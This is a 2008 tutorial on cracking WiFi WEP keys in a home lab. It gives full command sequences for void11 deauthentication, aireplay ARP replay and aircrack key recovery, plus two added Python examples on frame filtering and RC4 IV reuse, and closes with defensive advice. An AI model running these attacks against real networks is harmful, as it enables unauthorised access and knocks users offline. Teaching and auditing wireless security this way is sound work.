
Cracking a WiFi network's WEP key, step by step

Thursday, 22 May 2008, 08:14:00 (Hack)

Hundreds, maybe thousands, of articles have been written about attacking WEP, but how many people can actually crack it? Beginners usually get discouraged by the commands, by the card requirements and, harder still, by not being used to a Linux environment. In this series we walk through cracking WEP step by step.

The first part helps you build a lab and walks through the pieces of a WEP crack in a standardized, repeatable way, so that you can concentrate on the cracking tools without being held up by hardware or software problems. The whole procedure uses freely available software and needs no special hardware: a couple of laptops with wireless cards is enough. Part one builds the lab and shows how to scan for the target; before you can crack anything you need to gather some information about it. Part two describes how to push the access point into generating traffic and how to process the data after capture; after these two parts you will be able to crack a WEP key. Part three covers defensive skills for keeping intruders out of a wireless network.

Although a WEP crack can be done on a single laptop, ideally you should use two machines: one runs the active attack that stimulates the data flow so that enough data is captured in a short time, while the other sniffs or captures the traffic the first one provokes. You can do it on one machine with one wireless card, but I advise against it when you are just starting out: it is easy to get confused about what you are doing, and I have found the audit tools to be a little unstable when used that way.

Note that combining an active attack with a passive capture raises the chance of success and speeds up the crack, because it generates far more packets than a quiet network would. Here is the hardware list for our lab:

Wireless access point: this is our target; any model will do.
One laptop with a wireless card: this is the target machine, and the chipset of its wireless card does not matter. It is the "spare" machine.
Two laptops with wireless cards based on the PRISM 2 chipset: some programs such as Kismet support a wide range of wireless cards, but I recommend cards with the chipset named above. External cards with antennas are good too, but not required (it's up to you).
Cracking a WEP key also needs the hacking tools, of course. Get the Auditor Security Collection CD (search for it online or at a software shop), or use BackTrack, which is the newer version of the same thing: ftp://mirror.switch.ch/mirror/backtrack/bt2final.iso

Setting up the lab properly is very important, because you want to control the environment you work in. You should also think about preventing accidents against your neighbours' access points, because in part two some of our attacks can kick clients off an access point. Dangerous; want to continue?

The first step is to configure the lab: a target access point and the spare laptop mentioned above. Configure the access point with WEP security using the key we are going to crack, 64-bit, and set the SSID. Write down what you configured, you will need to compare against it later:
MAC address of the AP
SSID
CHANNEL
KEY
Then configure the spare laptop and connect it to the access point the normal way, entering the key correctly. Then write down the MAC of this spare laptop as well.
At this point our WLAN is configured. Now shut the spare laptop down. Here I should give each machine a name so you don't get confused:
Lab network: WLAN
Spare laptop: target computer
The two attacking laptops: laptop A and laptop B
Access point: target AP
OK, to work. Now we configure laptops A and B to scan the WLAN and sniff traffic for the attack. First put the hacking CD in and boot from it (I shouldn't have to tell you: go into the BIOS, set the CD as the first boot device, and remember to plug the wireless card in). After choosing a suitable resolution from the Auditor boot menu it loads into RAM and you get a screen like this:

The two important icons are the program menu and the command line at the bottom left of the screen.

Before going on, make sure the wireless card is attached correctly and has been configured by Auditor: click the command-line icon and type:

    iwconfig

In the information Auditor prints, look for wlan0: that means the card is PRISM-based and Auditor has detected it. Configure laptop B the same way, then shut it down; you won't need it until part two, where you learn how to stimulate traffic and capture it with laptop A. Now let's start Kismet, a useful tool for detecting WLANs and APs. It captures traffic as well, but there is a better program for that, airodump, part of aircrack,

which is a very good tool for WEP cracking, so we will use it and make sure the wireless card is working for scanning and capturing. Go to the program icon, then Auditor > Wireless > Scanner/Analyzer, and finally Kismet.

Besides scanning wireless networks, Kismet captures data into a file for later analysis, so it asks where to save the capture: click Desktop and then OK.

Kismet also asks for a prefix for the capture file; replace the default name with capture.

Once Kismet is running it lists all wireless networks in range, including the target AP you set up, with the channel in the CH column; check it against what you wrote down earlier. If Kismet lists many APs near your lab, move the lab a little further away from other people's APs.

While Kismet runs you will see the packet counts changing for all the APs on the right of the screen. Kismet shows the total number of networks found, the packets captured and the number of encrypted packets. Even though the target computer is switched off, packets from the AP still show up, because every few seconds the AP broadcasts a beacon announcing itself. Kismet runs in autofit mode, so it does not list the APs in a fixed order; press S to sort, choose a sort order, and it becomes much easier to read. Press C to sort the APs by channel.

By default Kismet hops through channels 1 to 11. Use the cursor keys to highlight your SSID and press L, and Kismet locks onto that SSID's channel.

You will notice that the packet counts of other APs may keep rising; that is because neighbouring channels overlap.

Now that Kismet is running, let's see what happens when the target computer starts talking on the network. Boot the spare laptop while Kismet is still scanning; when it boots into Windows and connects to the AP you will see a burst of encrypted data captured by Kismet. You will use these packets for the attack in part two.

At this point you know the basic approach to cracking WEP: one AP, two laptops for sniffing and attacking, and you can find your way around the software on the Auditor disk and use Kismet to find the wireless networks in range. In part two we use laptop B to push the WLAN into generating traffic, capture it and actually crack the key. Until then, get comfortable with Kismet, with your WLAN and with the other tools on the Auditor disk.

Part two

Part one showed the basics of WEP cracking and configured the WLAN and the two sniffing/attacking laptops. This part shows how to use more of the tools on the Auditor CD to capture traffic and crack WEP with it; it also shows how to use deauthentication and packet replay to push the WLAN into generating traffic, which is the main time saver in the crack.

Before starting, a few points that will save time and improve your chances of success: you need basic networking terminology and concepts, you should know how to ping, open a command prompt and enter commands, and some Linux basics help too. The hardware requirements are the same as in part one: a WLAN and a spare machine connected to the AP. The important rule for this lab is that you do not touch other people's APs without the owner's consent. Also note that all of this can be done on one laptop rather than two, but for clarity and to avoid confusion we use two.

The four main tools in this part are AIRODUMP, VOID11, AIREPLAY and AIRCRACK, all on the Auditor disk.
AIRODUMP: scans wireless networks and captures packets to a file.
VOID11: deauthenticates computers from the AP, forcing them to reconnect, which makes them send ARP requests.
AIREPLAY: catches an ARP request and resends it to the AP.
AIRCRACK: takes the capture files produced by AIRODUMP and recovers the key.
In part one you used Kismet to collect information; write it down now, you will need it later:
MAC of the AP

MAC of the spare laptop
CHANNEL the AP is using
WEP KEY configured on the AP
In real life someone trying to break into a wireless network usually does not have this information (the AP's MAC, the AP's channel, the target computer); that is called zero knowledge. If the attacker already has everything needed it is called a full-knowledge attack, and there is no challenge left. We assume we know nothing and describe how to obtain what we need. Finding the AP's MAC is no trouble with Kismet: do the same as in part one to get the AP's SSID, MAC and CHANNEL, and zero knowledge turns into everything needed to run the WEP crack.

Some people hide the SSID (disable its broadcast) to defeat some scanning software, but Kismet doesn't care: it lists everything it captures. Finding the client's MAC: we need one last piece of information before cracking, the MAC of a client connected to the AP. Back in Kismet press Q to return to the main menu, then Shift+C to list the client MACs; they appear in the left pane.

If you don't see a client MAC, make sure the spare laptop is connected to the AP; if it isn't, the following steps cannot work, because our lab needs a client connected to the AP.

Capturing data with AIRODUMP

Its speed aside, we need packets to work with during the WEP crack; airodump captures packets to a file for AIRCRACK to use later. Let's see how it works. Either laptop will do, but in this lab we use laptop A. Open a shell and type the following:

Commands for setting up airodump
    iwconfig wlan0 mode monitor
    iwconfig wlan0 channel THECHANNELNUM
    cd /ramdisk
    airodump wlan0 cap

Replace THECHANNELNUM with the channel number your AP is using. /ramdisk is where the captured data is stored. If there are other APs nearby and you only want to audit your own, add the AP's MAC to the end of the last command:

    airodump wlan0 cap1 MACADDRESSOFAP

This tells AIRODUMP to save only packets belonging to the target AP. Exit AIRODUMP with Ctrl+C; ls lists the saved files. Note that the file extension is .cap, and a successful capture at this stage will be only a few KB.

IVs:

While AIRODUMP runs you will see the AP's MAC listed under BSSID on the left, and the packet count and IVs count rising. This happens with any traffic, even when nobody is browsing; if you browse the web or read email on the target computer you will see the IVs count climb. IVs are what matter: they decide whether you can crack the key or not. Typically you need about 50,000 to 200,000 IVs for 64-bit and 200,000 to 700,000 for 128-bit. Note that with normal traffic the IVs do not rise quickly; it can take an hour or even days of capture before a crack succeeds. Fortunately there are tools to speed this up. The fastest way to generate many packets is to keep the WLAN busy; you can try downloading a file, or pinging from the target to some address, e.g. on the Windows target:

    ping -t -l 5000 (some IP)

And this is where VOID11 comes in: VOID11 deauthenticates the target computer from the AP to generate traffic. The target gets kicked off the network and automatically reconnects to the AP, and the reconnection generates traffic we can capture.

Boot laptop B with the Auditor CD in, open a shell and type:

Commands for setting up a void11 deauth attack
    switch-to-hostap
    cardctl eject
    cardctl insert
    iwconfig wlan0 channel THECHANNELNUM
    iwpriv wlan0 hostapd 1
    iwconfig wlan0 mode master
    void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

Replace THECHANNELNUM with the channel the AP is operating on, MACOFSTATION with the MAC of the target client and MACOFAP with the MAC of the AP. VOID11 may print an error message while running; don't worry about it. While laptop B runs this, look at what happens on the target computer: the network slows down, then stops, and a few seconds later it is disconnected entirely. You can verify this by keeping a ping running from the target to the AP. This is before running VOID11 on laptop B:

and this is while VOID11 is running; if you stop VOID11 the ping returns to normal.

You can also see it clearly in the wireless card's properties on the target.

And notice on laptop A that the IVs count jumps by 100 to 200 within a few seconds; that is the target reconnecting to the AP.

Packet replay with AIREPLAY

Although deauthentication generates traffic, it usually does not make the IVs rise fast enough. To generate traffic more effectively we use a replay attack: it takes a packet captured from the target and resends it to the AP far more often than normal, so the AP treats each copy as a fresh packet from the client and answers it, each answer carrying a new IV. Stop the deauth attack, then start AIREPLAY to work with captured packets, namely ARP requests.

Let's start from a clean state, i.e. restart both laptops A and B. Note that from here on laptop A runs only AIREPLAY, to stimulate network traffic and IVs and save cracking time, while laptop B runs AIRODUMP (or VOID11) and AIRCRACK to crack the key from the captured packets.

First start AIREPLAY on laptop A with the following commands:

Commands to set up aireplay to listen for an ARP packet
    switch-to-wlanng
    cardctl eject
    cardctl insert
    monitor.wlan wlan0 THECHANNELNUM
    cd /ramdisk
    aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

Note that switch-to-wlanng and monitor.wlan are scripts built into the disk to simplify typing. Replace THECHANNELNUM with the channel number found in the earlier steps and MACADDRESSOFAP with the AP's MAC. Now go to the target computer, boot it and connect to the AP, then go to laptop B, start VOID11 and watch: the client's network signal drops and may disappear entirely, and AIREPLAY's packet counter climbs quickly. Every so often AIREPLAY reports a packet it has found and asks whether you want to replay it.

You want a packet that matches these criteria:
FromDS - 0
ToDS - 1
BSSID - MAC Address of the Target AP
Source MAC - MAC Address of the Target computer
Destination MAC - FF:FF:FF:FF:FF:FF
Press n for no and AIREPLAY resumes listening; press y if it matches the criteria above, and AIREPLAY switches from capture mode to replay mode. Immediately go back to laptop B and stop VOID11. Catching a packet during deauthentication is considered the trickiest part of the crack. It generates traffic, but not much of it during the client's reconnection to the AP, and capture can be more complicated depending on the card driver and the client's operating system; VOID11 can easily flood the client with deauth packets so that it never gets time to reconnect. Sometimes you are lucky with the first packets, sometimes you have to wait for a matching one. The -d parameter in the AIREPLAY command filters on the destination MAC (here the broadcast address), and -m 68 -n 68 restrict it to 68-byte frames, which is the size of a WEP-encrypted ARP request; that is what makes it pick out ARP requests.

At this point laptop A is running AIREPLAY and producing enough IVs for us to crack. Stop VOID11 on laptop B and start AIRODUMP with these commands:

Starting up airodump after stopping void11
    switch-to-wlanng
    cardctl eject
    cardctl insert
    monitor.wlan wlan0 THECHANNELNUM
    cd /ramdisk
    airodump wlan0 cap1
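The FromDS/ToDS/BSSID/source/destination selection rule above, as an added Python example (not aireplay's own code): a small 802.11 header parser that applies those tests plus the 68-byte length window that -m 68 -n 68 enforce (24-byte MAC header + 4-byte IV/key-ID + 8-byte LLC/SNAP + 28-byte ARP + 4-byte ICV). The AP and client MACs and the four candidate frames are constructed for the demonstration, not captured.

```python
"""Frame filter reproducing the article's ARP-request selection rule.
Added example; MACs and frames below are constructed, not real captures."""
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
ARP_REQ_FRAME_LEN = 68      # 24 hdr + 4 IV/keyid + 8 LLC/SNAP + 28 ARP + 4 ICV

AP = "00:11:22:33:44:55"         # assumed target AP MAC
CLIENT = "66:77:88:99:aa:bb"     # assumed target client MAC


def mac_to_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def parse_80211_header(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 MAC header (three-address form).

    Frame Control byte 0 = version/type/subtype, byte 1 = flags
    (bit0 To DS, bit1 From DS, bit6 Protected, i.e. WEP).  Which of the
    three address fields is BSSID/source/destination depends on the DS bits.
    """
    if len(frame) < 24:
        raise ValueError("shorter than an 802.11 MAC header")
    fc0, fc1 = frame[0], frame[1]
    to_ds, from_ds = fc1 & 1, (fc1 >> 1) & 1
    a1, a2, a3 = (mac_to_str(frame[o:o + 6]) for o in (4, 10, 16))
    if (to_ds, from_ds) == (1, 0):        # station -> AP
        bssid, src, dst = a1, a2, a3
    elif (to_ds, from_ds) == (0, 1):      # AP -> station
        dst, bssid, src = a1, a2, a3
    else:                                 # IBSS/management, or WDS 4-address frame
        dst, src, bssid = a1, a2, a3
    return {
        "type": (fc0 >> 2) & 0x3,         # 0 management, 1 control, 2 data
        "to_ds": to_ds, "from_ds": from_ds,
        "protected": (fc1 >> 6) & 1,
        "bssid": bssid, "src": src, "dst": dst,
        "length": len(frame),
    }


def is_replayable_arp_request(frame: bytes, ap_mac: str, client_mac: str) -> bool:
    """The article's criteria plus the size window set by -m 68 -n 68."""
    h = parse_80211_header(frame)
    return (h["type"] == 2 and h["protected"] == 1
            and h["from_ds"] == 0 and h["to_ds"] == 1
            and h["bssid"] == ap_mac.lower()
            and h["src"] == client_mac.lower()
            and h["dst"] == BROADCAST
            and h["length"] == ARP_REQ_FRAME_LEN)


def build_wep_data_frame(to_ds: int, from_ds: int, a1: str, a2: str, a3: str,
                         body_len: int = 44) -> bytes:
    """Constructed test frame: data type, Protected bit set, opaque body
    (a real body is RC4-encrypted, so its content is irrelevant here)."""
    fc0 = 0x08                                   # version 0, type 2 (data), subtype 0
    fc1 = to_ds | (from_ds << 1) | 0x40          # Protected (WEP) flag
    header = struct.pack("<BBH", fc0, fc1, 0)    # FC + duration
    header += mac_to_bytes(a1) + mac_to_bytes(a2) + mac_to_bytes(a3)
    header += struct.pack("<H", 0)               # sequence control
    return header + bytes(body_len)


def candidates() -> list:
    """Four constructed frames: the ARP request we want, the AP's reply to it,
    a unicast frame from the client, and an oversized broadcast frame."""
    return [
        build_wep_data_frame(1, 0, AP, CLIENT, BROADCAST),                 # match
        build_wep_data_frame(0, 1, CLIENT, AP, AP),                        # FromDS=1
        build_wep_data_frame(1, 0, AP, CLIENT, "00:aa:bb:cc:dd:ee"),       # unicast
        build_wep_data_frame(1, 0, AP, CLIENT, BROADCAST, body_len=100),   # too long
    ]


def select(frames, ap: str = AP, client: str = CLIENT) -> list:
    """Indexes of the frames aireplay would offer to replay."""
    return [i for i, f in enumerate(frames) if is_replayable_arp_request(f, ap, client)]


if __name__ == "__main__":
    print("replayable frames:", select(candidates()))
```

Only the first frame passes; the AP's reply fails on the DS bits, the unicast frame on the destination, and the long frame on the size window. In a real capture the selection runs over every data frame on the locked channel, so the MAC filters matter: without them a broadcast ARP from any client of any nearby AP would be offered too.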

You know what to do here by now; the only thing to watch is the last line: if there are several wireless networks around you, add the AP's MAC to the end of the airodump command:

    airodump wlan0 cap1 MACADDRESSOFAP

Once AIRODUMP is up you will see the IVs rising very fast, about 200 per second, thanks to AIREPLAY on laptop A. While AIRODUMP writes IVs to the file we can already start AIRCRACK; the two run side by side. Open another shell and type:

Starting aircrack
    cd /ramdisk
    aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

Note: FUDGEFACTOR is an integer, default 2; MACADDRESSOFAP is the AP's MAC; WEPKEYLENGTH is the key length in bits, usually 64 or 128.

You can replace the 2 with a larger number; that makes the run slower but more likely to succeed. If it finds nothing in 64-bit format it gives up; press Ctrl+C to stop and the up arrow to rerun the AIRCRACK command, and it picks up the newly captured packets. The -p parameter sets the number of processes for multi-processor machines. Eventually you get a screen like this:

We finished cracking the 64-bit WEP key in under 5 minutes, including scanning and running AIRCRACK while AIREPLAY kept the traffic going. Sometimes you can crack with 25,000 IVs, but mostly you should have over 100,000, and 128-bit needs more, about 150,000 to 700,000; the more IVs the better. Importantly, you have to supply the key length you want to crack, and no tool on this disk tells you which length the AP uses, so try both 64 and 128.

And here it is with the 128-bit key length. You should have a reasonably powerful machine with a good CPU and plenty of RAM. You can also offload the processing by copying the capture files to another machine, which does not need to be on the network at all; it just runs AIRCRACK over the packets AIRODUMP saved. Or save them to a USB stick: open a shell and type:

Saving capture files to USB flash drive
    mkdir /mnt/usb
    mount -t vfat /dev/uba1 /mnt/usb
    cp /ramdisk/cap*.cap /mnt/usb
    umount /mnt/usb

Conclusion: WEP (Wired Equivalent Privacy) is not a good security method; we should use the stronger WPA2 (Wi-Fi Protected Access version 2). Here is the command summary:

Commands for setting up airodump
    iwconfig wlan0 mode monitor
    iwconfig wlan0 channel THECHANNELNUM
    cd /ramdisk
    airodump wlan0 cap

Commands for setting up a void11 deauth attack
    switch-to-hostap
    cardctl eject
    cardctl insert
    iwconfig wlan0 channel THECHANNELNUM
    iwpriv wlan0 hostapd 1
    iwconfig wlan0 mode master
    void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

Commands to set up aireplay to listen for an ARP packet
    switch-to-wlanng
    cardctl eject
    cardctl insert
    monitor.wlan wlan0 THECHANNELNUM
    cd /ramdisk
    aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

Starting up airodump after stopping void11
    switch-to-wlanng
    cardctl eject
    cardctl insert
    monitor.wlan wlan0 THECHANNELNUM
    cd /ramdisk
    airodump wlan0 cap1

Starting aircrack
    cd /ramdisk
    aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

Cracking a WiFi network's WEP key, and how to protect against it
Friday, 20 June 2008 04:08

WiFi wireless networking is common these days and used in many places for its convenience, but alongside it WiFi security gives quite a few people a headache, especially home and non-expert users. In this article I look at how the WiFi WEP encryption key (WEP key) can be recovered and at the countermeasures.

General introduction to WiFi and WEP

WiFi (Wireless Fidelity; the expansion is still debated because it doesn't really mean anything) is a set of protocols for wireless devices based on the 802.11 standards, covering access points and wireless client devices such as PC cards, USB cards and WiFi PDAs that connect to each other. WiFi uses several encryption standards to guard against unauthorized access, because the peculiarity of a wireless link is that access to the medium cannot be physically restricted: anyone within coverage can reach it, so encryption is essential for users who want privacy and safety. WiFi currently has three main encryption types: WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access) and WPA2. WEP is the earliest and the most widely supported by WiFi equipment manufacturers; most WiFi devices support WEP with key lengths from 40 to 128 bits. Recently many people have found weaknesses in WEP and published many cracking tools. Still, WEP cannot be abandoned overnight, because it has been in wide use for a long time and not every manufacturer has managed to move the devices they make to other encryption types.

So where is WEP's weakness? Because WEP uses a stream cipher, it needs a mechanism to make sure that two identical packets produce different ciphertext, so the attacker cannot draw conclusions from repeats. For that purpose a value called the IV (Initialization Vector) is combined with the key we enter, producing a different per-packet key each time data is encrypted. The IV is 24 bits long and changes randomly from packet to packet, so in practice the WEP key we specify is only 40 bits for 64-bit encryption and 104 bits for 128-bit encryption in APs, with 24 bits reserved for the IV (notice that when entering the key in an AP with 64-bit encryption you can only type 5 characters as a string, or 10 characters as hex, i.e. 40 bits).
Because the sending device generates the IV itself, it has to send it to the receiver unencrypted in the packet header; the receiver uses the IV together with the key to decrypt the rest of the packet. The IV is the weak point of WEP: because it is only 24 bits long it has just over 16 million possible values, so a cracker who captures enough packets can analyse these IVs and deduce the key the victim is using. In the next section I describe the test WiFi network and how to recover its key.

Test setup and cracking method

My test setup simulates a realistic WiFi network: a D-Link DI-524 AP and a computer with a WiFi card, referred to as the target AP and the target client, using 64-bit WEP with the key 1a2b3c4d5e in hex (see figure 1).
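The IV weakness described above, as an added Python example (not the article's code): plain RC4, WEP's IV||key construction, what an attacker learns when an IV repeats, and the birthday bound on a 24-bit IV space. The secret key is the article's test key 1a2b3c4d5e; the two ARP packets and the reused IV are constructed. aircrack's statistical attacks (FMS/KoreK) go further than this and need no exact repeat, but they rest on the same facts: every packet shows its IV in the clear and starts with a known plaintext prefix.

```python
"""WEP's weak spot in a few lines: per-packet RC4 key = IV || secret key,
the 3-byte IV travels in the clear, so the keystream repeats as soon as an
IV repeats.  Added example; key is the article's test key, packets are constructed."""
import math

IV_BITS = 24
SNAP_ARP = bytes.fromhex("aaaa030000000806")   # LLC/SNAP header that starts every ARP packet


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA) returning n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body framing: IV (clear) || RC4(IV||secret) xor P.
    The CRC-32 ICV is omitted; it does not change the argument."""
    if len(iv) != 3 or len(secret) not in (5, 13):
        raise ValueError("IV is 3 bytes; WEP secret is 5 (64-bit) or 13 (128-bit) bytes")
    return iv + xor(plaintext, rc4_keystream(iv + secret, len(plaintext)))


def learn_keystream(packet: bytes, known_plaintext: bytes = SNAP_ARP) -> tuple:
    """Known-plaintext step: C xor P = keystream for as many bytes as P is known.
    Every ARP packet gives at least the 8 SNAP bytes for free."""
    iv, body = packet[:3], packet[3:]
    return iv, xor(body[:len(known_plaintext)], known_plaintext)


def decrypt_with_reused_iv(packet: bytes, iv_keystreams: dict) -> bytes:
    """Decrypt as much of a packet as the keystream learned for its IV covers;
    returns b'' when this IV has not been seen before."""
    iv, body = packet[:3], packet[3:]
    return xor(body, iv_keystreams.get(iv, b""))


def packets_until_iv_collision(p: float = 0.5) -> int:
    """Birthday bound: packets before some IV repeats with probability p, for
    uniformly random IVs.  Many cards used a counter instead, which is worse:
    predictable, and restarting at 0 after every reset."""
    n = 2 ** IV_BITS
    return math.ceil(math.sqrt(2 * n * math.log(1 / (1 - p))))


def demo() -> dict:
    secret = bytes.fromhex("1a2b3c4d5e")        # the article's 64-bit test key
    iv = b"\x01\x02\x03"                        # constructed: the same IV used twice
    # Two constructed ARP requests (SNAP + 28-byte ARP body) from one client.
    arp1 = SNAP_ARP + bytes.fromhex("0001080006040001" "001122334455" "c0a80064"
                                    "000000000000" "c0a80001")
    arp2 = SNAP_ARP + bytes.fromhex("0001080006040001" "001122334455" "c0a80064"
                                    "000000000000" "c0a800fe")
    c1, c2 = wep_encrypt(secret, iv, arp1), wep_encrypt(secret, iv, arp2)
    # Without any key: same IV => ciphertext xor = plaintext xor, so the
    # attacker sees exactly where the two packets differ.
    leak = xor(c1[3:], c2[3:])
    # With one fully known plaintext (e.g. a packet the attacker provoked),
    # the whole keystream for that IV is known and the other packet falls.
    learned = dict([learn_keystream(c1, arp1)])
    return {
        "same_iv_same_keystream": leak == xor(arp1, arp2),
        "differing_offsets": [i for i, b in enumerate(leak) if b],
        "second_packet_recovered": decrypt_with_reused_iv(c2, learned) == arp2,
        "packets_for_50pct_collision": packets_until_iv_collision(),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The last figure is the point of the "16 million" remark: with random IVs a repeat is more likely than not after roughly 4,800 packets, and the 8 known SNAP bytes per packet mean every IV seen also yields keystream bytes for that IV, which is exactly the material the statistical key-recovery attacks consume.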

Figure 1: Setup page of the test AP.

The cracking tools I use are the Aircrack 2.4 suite running on Linux, NetStumbler, Kismet, a Linux live CD, and one laptop with two WiFi adapters or two computers each with one aircrack-compatible card. As the saying goes, know your enemy and know yourself: to crack the target WiFi network we first have to know everything about the target as well as its owner does (except the key, of course). The information needed is:
- The SSID or ESSID (Service Set Identifier, roughly the network's name, like a workgroup name in a peer-to-peer LAN); in this setup I named it thunghiem.
- The network's channel; here channel 11.
- The encryption type; here WEP 64-bit.
- The MAC address of the AP and the MAC of the target computer's card.
What do we collect this with? NetStumbler (figure 2) on Windows or Kismet on Linux; NetStumbler cannot see the target client's MAC, so we use Kismet or airodump from the aircrack suite for that.

Figure 2: Collecting information with NetStumbler.

With the target information collected, we move on to the aircrack suite. Aircrack is an open-source toolkit for Linux for recovering WEP/WPA keys, developed by Christophe Devine; there are many similar tools but aircrack is the favourite for being powerful and easy to use, although it supports rather few WiFi chipsets. The three main tools in the suite we use are:
- aireplay, for injection: it generates extra traffic on the target network. On networks with too little traffic we need it to cut the time spent waiting to capture enough packets for key recovery (example in figure 3).

Figure 3: deauthenticating the client, forging ARP and injecting data to raise network traffic
- airodump, to monitor and capture the packets the AP sends, saving them to a capture file (figure 4).

Figure 4: capturing packets; the station column holds the client's MAC
- aircrack, to read the capture file and recover the key (figure 5).

Figure 5: key recovery with aircrack; it takes just 1 second!!!

I won't list the exact command lines and parameters here, since the help option of each tool shows the precise syntax. First put both of our WiFi cards into monitor mode; see the help for ifconfig and iwconfig for how. Because my test network carries too little traffic I use aireplay to inject packets at the AP. The way aireplay works here is to send deauthentication frames, forged as if they came from the AP, which drop the client off the network (a trick many people use to annoy WiFi cafés); to reconnect, the client sends ARP requests. We then run aireplay with other parameters together with the client's MAC to forge and send these ARP requests to the AP continuously, so that the AP keeps answering them. While aireplay runs, we run airodump to capture the AP's replies, which carry the IVs (note that aireplay and airodump must run on two different cards, not the same one). Once airodump is running, watch the screen: the IV count in the #Data column rises quickly (the Beacons column keeps counting as well) when aireplay is injecting. The documentation says you need to capture somewhat under 500 thousand IVs to recover a 64-bit key and 500 thousand or more for a 128-bit key; in practice I needed just over 300k IVs here. When airodump has captured a fair number, leave it running, open another console and run aircrack to read the IVs from airodump's file and recover the key; this is very fast, usually under 5 seconds on my Pentium 4 Mobile. Total time for injection and key recovery was under an hour. Impressive, isn't it? The suite can also recover WPA keys (WPA-PSK, by a dictionary attack on a captured handshake), a much safer and stronger method than WEP; for lack of space I won't cover that in this article.

Security methods for WiFi networks

In this section I present ways to secure a WiFi network and weigh the pros and cons of each, from simple to complex; all of them are within anyone's reach. They can be applied one at a time or combined.
- Turn off the access point: when you're done or don't need the network, switch it off. This sounds extreme and a bit silly, but it is 100% effective.
- Disable SSID broadcast: most APs allow this; it makes the Windows XP wireless zero configuration utility and scanners like NetStumbler unable to see our network. However, it does not stop stronger scanners such as Kismet.
- MAC address filtering: APs can filter the MACs of connecting clients, in two modes, allow only the listed MACs or deny only the listed MACs. This still doesn't stop a skilled attacker, who can learn the MACs of the clients on our network (they are sent in the clear in every frame) and easily impersonate one by changing the MAC of their own WiFi card.
- Encryption: WEP and WPA/WPA2 are the usual encryption types in APs. If your AP only supports WEP, use the longest key it allows (usually 128-bit); if it supports WPA, use a key of at least 128 or 256 bits. Most APs that support WPA use WPA-PSK (pre-shared key or passphrase); WPA2 is safer still. A RADIUS server is only needed for WPA/WPA2-Enterprise (802.1X authentication); WPA2-PSK works without one. Make the key as complex as possible (upper- and lower-case letters, digits and special characters mixed together) and don't use dictionary words or meaningful phrases, because a cracker can still recover a WPA key by brute force with a dictionary. On older devices this may reduce throughput between AP and client, since they spend more effort on the more complex encryption and decryption.
- User authentication, firewalls, disk and file encryption: these won't stop someone recovering the WEP/WPA key, but they stop them from reading or interfering with the data flowing over the network and the resources on it.

Conclusion

This article gave a fairly general picture of wireless security today. We cannot abandon WEP entirely, because so many WiFi devices support it well, and it has quite a few weaknesses that are easy to exploit. But it is not a disaster either, if we know how to combine a few suitable defences for our WiFi network. With this article I wanted to help people understand WiFi security better. I take no responsibility for anything that happens if someone uses the information in this article for bad purposes, and I will not answer any questions related to key recovery.
